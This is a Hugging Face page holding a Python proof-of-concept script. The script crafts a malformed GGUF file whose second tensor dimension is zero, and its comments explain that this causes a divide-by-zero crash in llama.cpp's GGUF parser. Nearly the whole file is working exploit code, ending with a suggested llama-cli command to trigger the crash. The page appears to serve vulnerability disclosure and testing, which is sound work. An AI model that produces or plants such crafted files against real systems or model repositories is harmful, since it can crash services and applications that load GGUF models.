Upload poc_divzero.py with huggingface_hub

243748f verified about 1 month ago

4.36 kB

	#!/usr/bin/env python3
	"""
	PoC: Divide-by-zero in llama.cpp GGUF parser via zero tensor dimension.

	Vulnerability: In ggml/src/gguf.cpp lines 550-552, the overflow check does:
	if (ok && ((INT64_MAX/info.t.ne[1] <= info.t.ne[0]) \|\| ...))

	The dimensions ne[0..3] are validated for < 0 at line 541 but NOT for == 0.
	A dimension of 0 passes the < 0 check, then INT64_MAX / 0 triggers
	undefined behavior (divide-by-zero crash / SIGFPE on most platforms).

	Attack vector:
	- Craft a GGUF file with 1 tensor
	- Tensor has n_dims=2, ne[0]=32 (valid for F32 block size), ne[1]=0
	- ne[2] and ne[3] default to 1 (set at line 535)
	- The parser reads ne[0]=32, ne[1]=0, then at line 550:
	INT64_MAX / info.t.ne[1] => INT64_MAX / 0 => CRASH

	GGUF v3 binary format for tensor info:
	- name: string (uint64 length + chars)
	- n_dims: uint32
	- ne[0..n_dims-1]: int64 each
	- type: int32 (ggml_type)
	- offset: uint64
	"""

	import struct
	import os

	# GGUF constants
	GGUF_MAGIC = b"GGUF"
	GGUF_VERSION = 3
	GGUF_TYPE_STRING = 8
	GGUF_TYPE_UINT32 = 4

	# ggml type constants
	GGML_TYPE_F32 = 0


	def write_string(f, s):
	"""Write a GGUF string: uint64 length + chars (no null terminator)."""
	encoded = s.encode('utf-8')
	f.write(struct.pack('<Q', len(encoded)))
	f.write(encoded)


	def write_kv_string(f, key, value):
	"""Write a KV pair with string value."""
	write_string(f, key) # key
	f.write(struct.pack('<I', GGUF_TYPE_STRING)) # type = string
	write_string(f, value) # value


	def create_divzero_gguf(output_path):
	"""Create a GGUF file with a tensor whose ne[1]=0, triggering divide-by-zero."""

	n_tensors = 1
	n_kv = 1 # just general.architecture

	with open(output_path, 'wb') as f:
	# ===== GGUF Header =====
	f.write(GGUF_MAGIC) # magic: "GGUF"
	f.write(struct.pack('<I', GGUF_VERSION)) # version: 3
	f.write(struct.pack('<Q', n_tensors)) # n_tensors: 1
	f.write(struct.pack('<Q', n_kv)) # n_kv: 1

	# ===== KV Pairs =====
	write_kv_string(f, "general.architecture", "llama")

	# ===== Tensor Info =====
	# Tensor name
	write_string(f, "weight")

	# n_dims = 2 (so ne[0] and ne[1] are read from file; ne[2], ne[3] default to 1)
	f.write(struct.pack('<I', 2))

	# ne[0] = 32 (valid, non-zero, divisible by F32 block size of 1)
	f.write(struct.pack('<q', 32))

	# ne[1] = 0 <--- THIS IS THE TRIGGER
	# Passes the "< 0" check at line 541 (0 is not < 0)
	# Then at line 550: INT64_MAX / ne[1] = INT64_MAX / 0 => CRASH
	f.write(struct.pack('<q', 0))

	# Tensor type = GGML_TYPE_F32 (0)
	f.write(struct.pack('<i', GGML_TYPE_F32))

	# Tensor data offset within buffer (doesn't matter, we'll crash before using it)
	f.write(struct.pack('<Q', 0))

	# ===== Alignment padding + tensor data =====
	# The parser expects data after tensor info, aligned to GGUF_DEFAULT_ALIGNMENT (32).
	# We don't need actual tensor data since we crash during parsing, but include
	# a small amount to avoid premature EOF errors before hitting the vulnerable code.
	# Pad to 32-byte alignment
	current_pos = f.tell()
	alignment = 32
	padding_needed = (alignment - (current_pos % alignment)) % alignment
	f.write(b'\x00' * padding_needed)

	# Write minimal tensor "data" (32 floats * 0 rows = 0 bytes, but write something)
	# Actually, since we crash during gguf_init parsing, no data is needed.

	file_size = os.path.getsize(output_path)
	print(f"[*] Created: {output_path}")
	print(f"[*] File size: {file_size} bytes")
	print(f"[*] Tensor: name='weight', n_dims=2, ne=[32, 0, 1, 1], type=F32")
	print(f"[*] Vulnerability: INT64_MAX / ne[1] = INT64_MAX / 0 => divide-by-zero")
	print(f"[*]")
	print(f"[*] Test with:")
	print(f"[*] ./llama-cli -m {output_path} -p 'hello'")
	print(f"[*] Expected: Floating point exception (SIGFPE) or crash")


	if __name__ == "__main__":
	os.makedirs("/Users/eltarne/Documents/script/gguf_poc", exist_ok=True)
	output_path = "/Users/eltarne/Documents/script/gguf_poc/poc_divzero.gguf"
	create_divzero_gguf(output_path)